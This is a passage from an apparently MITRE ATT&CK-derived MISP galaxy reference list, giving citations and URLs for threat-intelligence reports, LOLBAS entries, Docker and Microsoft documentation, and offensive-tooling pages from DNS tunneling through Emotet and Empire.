Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can be (ab)used by malicious actors. Retrieved October 3, 2020.

The tag is: misp-galaxy:references="Unit42 DNS Mar 2019"

Table 13398. Table References

Links

https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/

dnx.exe - LOLBAS Project

LOLBAS. (2018, May 25). dnx.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="dnx.exe - LOLBAS Project"

Table 13399. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dnx/

Docker Daemon CLI

Docker. (n.d.). DockerD CLI. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Docker Daemon CLI"

Table 13400. Table References

Links

https://docs.docker.com/engine/reference/commandline/dockerd/

Docker API

Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.

The tag is: misp-galaxy:references="Docker API"

Table 13401. Table References

Links

https://docs.docker.com/engine/api/v1.41/

Docker Build Image

Docker. ( null). Docker Engine API v1.41 Reference - Build an Image. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Docker Build Image"

Table 13402. Table References

Links

https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild

Docker Containers API

Docker. (n.d.). Docker Engine API v1.41 Reference - Container. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Docker Containers API"

Table 13403. Table References

Links

https://docs.docker.com/engine/api/v1.41/#tag/Container

Docker Exec

Docker. (n.d.). Docker Exec. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Docker Exec"

Table 13404. Table References

Links

https://docs.docker.com/engine/reference/commandline/exec/

Docker Images

Docker. (n.d.). Docker Images. Retrieved April 6, 2021.

The tag is: misp-galaxy:references="Docker Images"

Table 13405. Table References

Links

https://docs.docker.com/engine/reference/commandline/images/

Docker Overview

Docker. (n.d.). Docker Overview. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Docker Overview"

Table 13406. Table References

Links

https://docs.docker.com/get-started/overview/

Docker Entrypoint

Docker. (n.d.). Docker run reference. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Docker Entrypoint"

Table 13407. Table References

Links

https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime

TechNet Server Operator Scheduled Task

Microsoft. (2012, November 15). Domain controller: Allow server operators to schedule tasks. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="TechNet Server Operator Scheduled Task"

Table 13408. Table References

Links

https://technet.microsoft.com/library/jj852168.aspx

Cisco Umbrella DGA

Scarfo, A. (2016, October 10). Domain Generation Algorithms – Why so effective?. Retrieved February 18, 2019.

The tag is: misp-galaxy:references="Cisco Umbrella DGA"

Table 13409. Table References

Links

https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/

Microsoft GetAllTrustRelationships

Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019.

The tag is: misp-galaxy:references="Microsoft GetAllTrustRelationships"

Table 13410. Table References

Links

https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships

ICANNDomainNameHijacking

ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="ICANNDomainNameHijacking"

Table 13411. Table References

Links

https://www.icann.org/groups/ssac/documents/sac-007-en

Palo Alto Unit 42 Domain Shadowing 2022

Janos Szurdi, Rebekah Houser and Daiping Liu. (2022, September 21). Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime. Retrieved March 7, 2023.

The tag is: misp-galaxy:references="Palo Alto Unit 42 Domain Shadowing 2022"

Table 13412. Table References

Links

https://unit42.paloaltonetworks.com/domain-shadowing/

ASERT Donot March 2018

Schwarz, D., Sopko J. (2018, March 08). Donot Team Leverages New Modular Malware Framework in South Asia. Retrieved June 11, 2018.

The tag is: misp-galaxy:references="ASERT Donot March 2018"

Table 13413. Table References

Links

https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/

Mandiant URL Obfuscation 2023

Nick Simonian. (2023, May 22). Don’t @ Me: URL Obfuscation Through Schema Abuse. Retrieved August 4, 2023.

The tag is: misp-galaxy:references="Mandiant URL Obfuscation 2023"

Table 13414. Table References

Links

https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse

Donut Github

TheWover. (2019, May 9). donut. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Donut Github"

Table 13415. Table References

Links

https://github.com/TheWover/donut

Introducing Donut

The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="Introducing Donut"

Table 13416. Table References

Links

https://thewover.github.io/Introducing-Donut/

Dotnet.exe - LOLBAS Project

LOLBAS. (2019, November 12). Dotnet.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Dotnet.exe - LOLBAS Project"

Table 13417. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/

cyberproof-double-bounce

Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing . Retrieved February 24, 2023.

The tag is: misp-galaxy:references="cyberproof-double-bounce"

Table 13418. Table References

Links

https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends

FireEye APT41 Aug 2019

Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.

The tag is: misp-galaxy:references="FireEye APT41 Aug 2019"

Table 13419. Table References

Links

https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf

FireEye APT41 2019

FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.

The tag is: misp-galaxy:references="FireEye APT41 2019"

Table 13420. Table References

Links

https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf

Malwarebytes IssacWiper CaddyWiper March 2022

Threat Intelligence Team. (2022, March 18). Double header: IsaacWiper and CaddyWiper . Retrieved April 11, 2022.

The tag is: misp-galaxy:references="Malwarebytes IssacWiper CaddyWiper March 2022"

Table 13421. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/

tlseminar_downgrade_att

Team Cinnamon. (2017, February 3). Downgrade Attacks. Retrieved December 9, 2021.

The tag is: misp-galaxy:references="tlseminar_downgrade_att"

Table 13422. Table References

Links

https://tlseminar.github.io/downgrade-attacks/

LogRhythm Do You Trust Oct 2014

Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved December 17, 2018.

The tag is: misp-galaxy:references="LogRhythm Do You Trust Oct 2014"

Table 13423. Table References

Links

https://logrhythm.com/blog/do-you-trust-your-computer/

VNC Vulnerabilities

Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="VNC Vulnerabilities"

Table 13424. Table References

Links

https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/

Accenture Dragonfish Jan 2018

Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 14, 2018.

The tag is: misp-galaxy:references="Accenture Dragonfish Jan 2018"

Table 13425. Table References

Links

https://www.accenture.com/t20180127T003755Z_w/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf

Symantec Dragonfly

Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.

The tag is: misp-galaxy:references="Symantec Dragonfly"

Table 13426. Table References

Links

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

Symantec Dragonfly Sept 2017

Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.

The tag is: misp-galaxy:references="Symantec Dragonfly Sept 2017"

Table 13427. Table References

Links

https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers

Symantec Dragonfly 2.0 October 2017

Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022.

The tag is: misp-galaxy:references="Symantec Dragonfly 2.0 October 2017"

Table 13428. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks

Kaspersky Dridex May 2017

Slepogin, N. (2017, May 25). Dridex: A History of Evolution. Retrieved May 31, 2019.

The tag is: misp-galaxy:references="Kaspersky Dridex May 2017"

Table 13429. Table References

Links

https://securelist.com/dridex-a-history-of-evolution/78531/

Dell Dridex Oct 2015

Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019.

The tag is: misp-galaxy:references="Dell Dridex Oct 2015"

Table 13430. Table References

Links

https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation

Red Canary Dridex Threat Report 2021

Red Canary. (2021, February 9). Dridex - Red Canary Threat Detection Report. Retrieved August 3, 2023.

The tag is: misp-galaxy:references="Red Canary Dridex Threat Report 2021"

Table 13431. Table References

Links

https://redcanary.com/threat-detection-report/threats/dridex/

volexity_0day_sophos_FW

Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.

The tag is: misp-galaxy:references="volexity_0day_sophos_FW"

Table 13432. Table References

Links

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

Microsoft Driverquery

Microsoft. (n.d.). driverquery. Retrieved March 28, 2023.

The tag is: misp-galaxy:references="Microsoft Driverquery"

Table 13433. Table References

Links

https://learn.microsoft.com/windows-server/administration/windows-commands/driverquery

Dropbox Malware Sync

David Talbot. (2013, August 21). Dropbox and Similar Services Can Sync Malware. Retrieved May 31, 2023.

The tag is: misp-galaxy:references="Dropbox Malware Sync"

Table 13434. Table References

Links

https://www.technologyreview.com/2013/08/21/83143/dropbox-and-similar-services-can-sync-malware/

Cyberreason Anchor December 2019

Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.

The tag is: misp-galaxy:references="Cyberreason Anchor December 2019"

Table 13435. Table References

Links

https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware

Samba DRSUAPI

SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Samba DRSUAPI"

Table 13436. Table References

Links

https://wiki.samba.org/index.php/DRSUAPI

dsdbutil.exe - LOLBAS Project

LOLBAS. (2023, May 31). dsdbutil.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="dsdbutil.exe - LOLBAS Project"

Table 13437. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dsdbutil/

TechNet Dsquery

Microsoft. (n.d.). Dsquery. Retrieved April 18, 2016.

The tag is: misp-galaxy:references="TechNet Dsquery"

Table 13438. Table References

Links

https://technet.microsoft.com/en-us/library/cc732952.aspx

CyberBit Dtrack

Hod Gavriel. (2019, November 21). Dtrack: In-depth analysis of APT on a nuclear power plant. Retrieved January 20, 2021.

The tag is: misp-galaxy:references="CyberBit Dtrack"

Table 13439. Table References

Links

https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/

Kaspersky Dtrack

Kaspersky Global Research and Analysis Team. (2019, September 23). DTrack: previously unknown spy-tool by Lazarus hits financial institutions and research centers. Retrieved January 20, 2021.

The tag is: misp-galaxy:references="Kaspersky Dtrack"

Table 13440. Table References

Links

https://usa.kaspersky.com/about/press-releases/2019_dtrack-previously-unknown-spy-tool-hits-financial-institutions-and-research-centers

Crowdstrike Qakbot October 2020

CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Crowdstrike Qakbot October 2020"

Table 13441. Table References

Links

https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/

Dump64.exe - LOLBAS Project

LOLBAS. (2021, November 16). Dump64.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Dump64.exe - LOLBAS Project"

Table 13442. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dump64/

dump_pwd_dcsync

Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.

The tag is: misp-galaxy:references="dump_pwd_dcsync"

Table 13443. Table References

Links

https://adsecurity.org/?p=2053

ired mscache

Mantvydas Baranauskas. (2019, November 16). Dumping and Cracking mscash - Cached Domain Credentials. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="ired mscache"

Table 13444. Table References

Links

https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials

ired Dumping LSA Secrets

Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="ired Dumping LSA Secrets"

Table 13445. Table References

Links

https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets

DumpMinitool.exe - LOLBAS Project

LOLBAS. (2022, January 20). DumpMinitool.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="DumpMinitool.exe - LOLBAS Project"

Table 13446. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/

Wikipedia Duqu

Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.

The tag is: misp-galaxy:references="Wikipedia Duqu"

Table 13447. Table References

Links

https://en.wikipedia.org/wiki/Duqu

Dxcap.exe - LOLBAS Project

LOLBAS. (2018, May 25). Dxcap.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Dxcap.exe - LOLBAS Project"

Table 13448. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/

TheEvilBit DYLD_INSERT_LIBRARIES

Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX. Retrieved March 26, 2020.

The tag is: misp-galaxy:references="TheEvilBit DYLD_INSERT_LIBRARIES"

Table 13449. Table References

Links

https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/

Wardle Dylib Hijacking OSX 2015

Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Wardle Dylib Hijacking OSX 2015"

Table 13450. Table References

Links

https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf

Dragos DYMALLOY

Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.

The tag is: misp-galaxy:references="Dragos DYMALLOY"

Table 13451. Table References

Links

https://www.dragos.com/threat/dymalloy/

MWRInfoSecurity Dynamic Hooking 2015

Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User Mode. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="MWRInfoSecurity Dynamic Hooking 2015"

Table 13452. Table References

Links

https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/

rfc2131

Droms, R. (1997, March). Dynamic Host Configuration Protocol. Retrieved March 9, 2022.

The tag is: misp-galaxy:references="rfc2131"

Table 13453. Table References

Links

https://datatracker.ietf.org/doc/html/rfc2131

rfc3315

  1. Bound, et al. (2003, July). Dynamic Host Configuration Protocol for IPv6 (DHCPv6). Retrieved June 27, 2022.

The tag is: misp-galaxy:references="rfc3315"

Table 13454. Table References

Links

https://datatracker.ietf.org/doc/html/rfc3315

Microsoft DLL Redirection

Microsoft. (n.d.). Dynamic-Link Library Redirection. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Microsoft DLL Redirection"

Table 13455. Table References

Links

http://msdn.microsoft.com/en-US/library/ms682600

Microsoft. (2018, May 31). Dynamic-Link Library Redirection. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="Microsoft Dynamic-Link Library Redirection"

Table 13456. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN

Microsoft. (n.d.). Dynamic-Link Library Search Order. Retrieved November 30, 2014.

The tag is: misp-galaxy:references="Microsoft DLL Search"

Table 13457. Table References

Links

http://msdn.microsoft.com/en-US/library/ms682586

Microsoft. (2018, May 31). Dynamic-Link Library Search Order. Retrieved November 30, 2014.

The tag is: misp-galaxy:references="Microsoft Dynamic Link Library Search Order"

Table 13458. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN

MSDN DLL Security

Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved July 25, 2016.

The tag is: misp-galaxy:references="MSDN DLL Security"

Table 13459. Table References

Links

https://msdn.microsoft.com/en-us/library/ff919712.aspx

Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved July 25, 2016.

The tag is: misp-galaxy:references="Microsoft Dynamic-Link Library Security"

Table 13460. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security?redirectedfrom=MSDN

Microsoft DLL Security

Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft DLL Security"

Table 13461. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx

Symantec Dyre June 2015

Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.

The tag is: misp-galaxy:references="Symantec Dyre June 2015"

Table 13462. Table References

Links

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf

EA Hacked via Slack - June 2021

Anthony Spadafora. (2021, June 11). EA hack reportedly used stolen cookies and Slack to target gaming giant. Retrieved May 31, 2022.

The tag is: misp-galaxy:references="EA Hacked via Slack - June 2021"

Table 13463. Table References

Links

https://www.techradar.com/news/ea-hack-reportedly-used-stolen-cookies-and-slack-to-hack-gaming-giant

CrowdStrike StellarParticle January 2022

CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.

The tag is: misp-galaxy:references="CrowdStrike StellarParticle January 2022"

Table 13464. Table References

Links

https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

Trend Micro Muddy Water March 2021

Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.

The tag is: misp-galaxy:references="Trend Micro Muddy Water March 2021"

Table 13465. Table References

Links

https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html

U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021.

The tag is: misp-galaxy:references="SEC EDGAR Search"

Table 13466. Table References

Links

https://www.sec.gov/edgar/search-and-access

Intrinsec Egregor Nov 2020

Bichet, J. (2020, November 12). Egregor – Prolock: Fraternal Twins ?. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="Intrinsec Egregor Nov 2020"

Table 13467. Table References

Links

https://www.intrinsec.com/egregor-prolock/?cn-reloaded=1

Cybereason Egregor Nov 2020

Rochberger, L. (2020, November 26). Cybereason vs. Egregor Ransomware. Retrieved December 30, 2020.

The tag is: misp-galaxy:references="Cybereason Egregor Nov 2020"

Table 13468. Table References

Links

https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware

Cyble Egregor Oct 2020

Cybleinc. (2020, October 31). Egregor Ransomware – A Deep Dive Into Its Activities and Techniques. Retrieved December 29, 2020.

The tag is: misp-galaxy:references="Cyble Egregor Oct 2020"

Table 13469. Table References

Links

https://cybleinc.com/2020/10/31/egregor-ransomware-a-deep-dive-into-its-activities-and-techniques/

NHS Digital Egregor Nov 2020

NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020.

The tag is: misp-galaxy:references="NHS Digital Egregor Nov 2020"

Table 13470. Table References

Links

https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary

Security Boulevard Egregor Oct 2020

Meskauskas, T.. (2020, October 29). Egregor: Sekhmet’s Cousin. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="Security Boulevard Egregor Oct 2020"

Table 13471. Table References

Links

https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/

Cybersecurity and Infrastructure Security Agency. (2020, June 30). EINSTEIN Data Trends – 30-day Lookback. Retrieved October 25, 2023.

The tag is: misp-galaxy:references="U.S. CISA Trends June 30 2020"

Table 13472. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-182a

Dragos EKANS

Dragos. (2020, February 3). EKANS Ransomware and ICS Operations. Retrieved February 9, 2021.

The tag is: misp-galaxy:references="Dragos EKANS"

Table 13473. Table References

Links

https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/

EldoS RawDisk ITpro

Edwards, M. (2007, March 14). EldoS Provides Raw Disk Access for Vista and XP. Retrieved March 26, 2019.

The tag is: misp-galaxy:references="EldoS RawDisk ITpro"

Table 13474. Table References

Links

https://www.itprotoday.com/windows-78/eldos-provides-raw-disk-access-vista-and-xp

Microsoft Targeting Elections September 2020

Burt, T. (2020, September 10). New cyberattacks targeting U.S. elections. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Microsoft Targeting Elections September 2020"

Table 13475. Table References

Links

https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/

Secureworks IRON RITUAL USAID Phish May 2021

Secureworks CTU. (2021, May 28). USAID-Themed Phishing Campaign Leverages U.S. Elections Lure. Retrieved February 24, 2022.

The tag is: misp-galaxy:references="Secureworks IRON RITUAL USAID Phish May 2021"

Table 13476. Table References

Links

https://www.secureworks.com/blog/usaid-themed-phishing-campaign-leverages-us-elections-lure

Dragos ELECTRUM

Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="Dragos ELECTRUM"

Table 13477. Table References

Links

https://www.dragos.com/resource/electrum/

Symantec Elfin Mar 2019

Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.

The tag is: misp-galaxy:references="Symantec Elfin Mar 2019"

Table 13478. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

Backtrace VDSO

backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020.

The tag is: misp-galaxy:references="Backtrace VDSO"

Table 13479. Table References

Links

https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/

Securelist Machete Aug 2014

Kaspersky Global Research and Analysis Team. (2014, August 20). El Machete. Retrieved September 13, 2019.

The tag is: misp-galaxy:references="Securelist Machete Aug 2014"

Table 13480. Table References

Links

https://securelist.com/el-machete/66108/

Cylance Machete Mar 2017

The Cylance Threat Research Team. (2017, March 22). El Machete’s Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.

The tag is: misp-galaxy:references="Cylance Machete Mar 2017"

Table 13481. Table References

Links

https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html

Power Automate Email Exfiltration Controls

Microsoft. (2022, February 15). Email exfiltration controls for connectors. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Power Automate Email Exfiltration Controls"

Table 13482. Table References

Links

https://docs.microsoft.com/en-us/power-platform/admin/block-forwarded-email-from-power-automate

HackersArise Email

Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="HackersArise Email"

Table 13483. Table References

Links

https://www.hackers-arise.com/email-scraping-and-maltego

Elastic - Koadiac Detection with EQL

Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.

The tag is: misp-galaxy:references="Elastic - Koadiac Detection with EQL"

Table 13484. Table References

Links

https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql

Nccgroup Emissary Panda May 2018

Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018.

The tag is: misp-galaxy:references="Nccgroup Emissary Panda May 2018"

Table 13485. Table References

Links

https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/

Unit42 Emissary Panda May 2019

Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.

The tag is: misp-galaxy:references="Unit42 Emissary Panda May 2019"

Table 13486. Table References

Links

https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

Emissary Trojan Feb 2016

Falcone, R. and Miller-Osborn, J. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?. Retrieved February 15, 2016.

The tag is: misp-galaxy:references="Emissary Trojan Feb 2016"

Table 13487. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/

Sophos Emotet Apr 2019

Brandt, A.. (2019, May 5). Emotet 101, stage 4: command and control. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="Sophos Emotet Apr 2019"

Table 13488. Table References

Links

https://news.sophos.com/en-us/2019/03/05/emotet-101-stage-4-command-and-control/

CIS Emotet Apr 2017

CIS. (2017, April 28). Emotet Changes TTPs and Arrives in United States. Retrieved January 17, 2019.

The tag is: misp-galaxy:references="CIS Emotet Apr 2017"

Table 13489. Table References

Links

https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/

Binary Defense Emotes Wi-Fi Spreader

Binary Defense. (n.d.). Emotet Evolves With new Wi-Fi Spreader. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="Binary Defense Emotes Wi-Fi Spreader"

Table 13490. Table References

Links

https://www.binarydefense.com/resources/blog/emotet-evolves-with-new-wi-fi-spreader/

ESET Emotet Nov 2018

ESET . (2018, November 9). Emotet launches major new spam campaign. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="ESET Emotet Nov 2018"

Table 13491. Table References

Links

https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/

Trend Micro Emotet 2020

Cybercrime & Digital Threat Team. (2020, February 13). Emotet Now Spreads via Wi-Fi. Retrieved February 16, 2022.

The tag is: misp-galaxy:references="Trend Micro Emotet 2020"

Table 13492. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi

Talos Emotet Jan 2019

Brumaghin, E.. (2019, January 15). Emotet re-emerges after the holidays. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Talos Emotet Jan 2019"

Table 13493. Table References

Links

https://blog.talosintelligence.com/2019/01/return-of-emotet.html

Emotet shutdown

The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.

The tag is: misp-galaxy:references="Emotet shutdown"

Table 13494. Table References

Links

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

Carbon Black Emotet Apr 2019

Lee, S.. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019.

The tag is: misp-galaxy:references="Carbon Black Emotet Apr 2019"

Table 13495. Table References

Links

https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/

DanielManea Emotet May 2017

Manea, D.. (2019, May 25). Emotet v4 Analysis. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="DanielManea Emotet May 2017"

Table 13496. Table References

Links

https://danielmanea.com/category/reverseengineering/

Empire Keychain Decrypt

Empire. (2018, March 8). Empire keychaindump_decrypt Module. Retrieved April 14, 2022.

The tag is: misp-galaxy:references="Empire Keychain Decrypt"

Table 13497. Table References

Links

https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py

Github EmpireProject CreateHijacker Dylib

Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="Github EmpireProject CreateHijacker Dylib"

Table 13498. Table References

Links

https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py

Github EmpireProject HijackScanner

Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="Github EmpireProject HijackScanner"

Table 13499. Table References

Links

https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py

Microsoft ASR Nov 2017

Brower, N. & D’Souza-Wiltshire, I. (2017, November 9). Enable Attack surface reduction. Retrieved February 3, 2018.

The tag is: misp-galaxy:references="Microsoft ASR Nov 2017"

Table 13500. Table References

Links

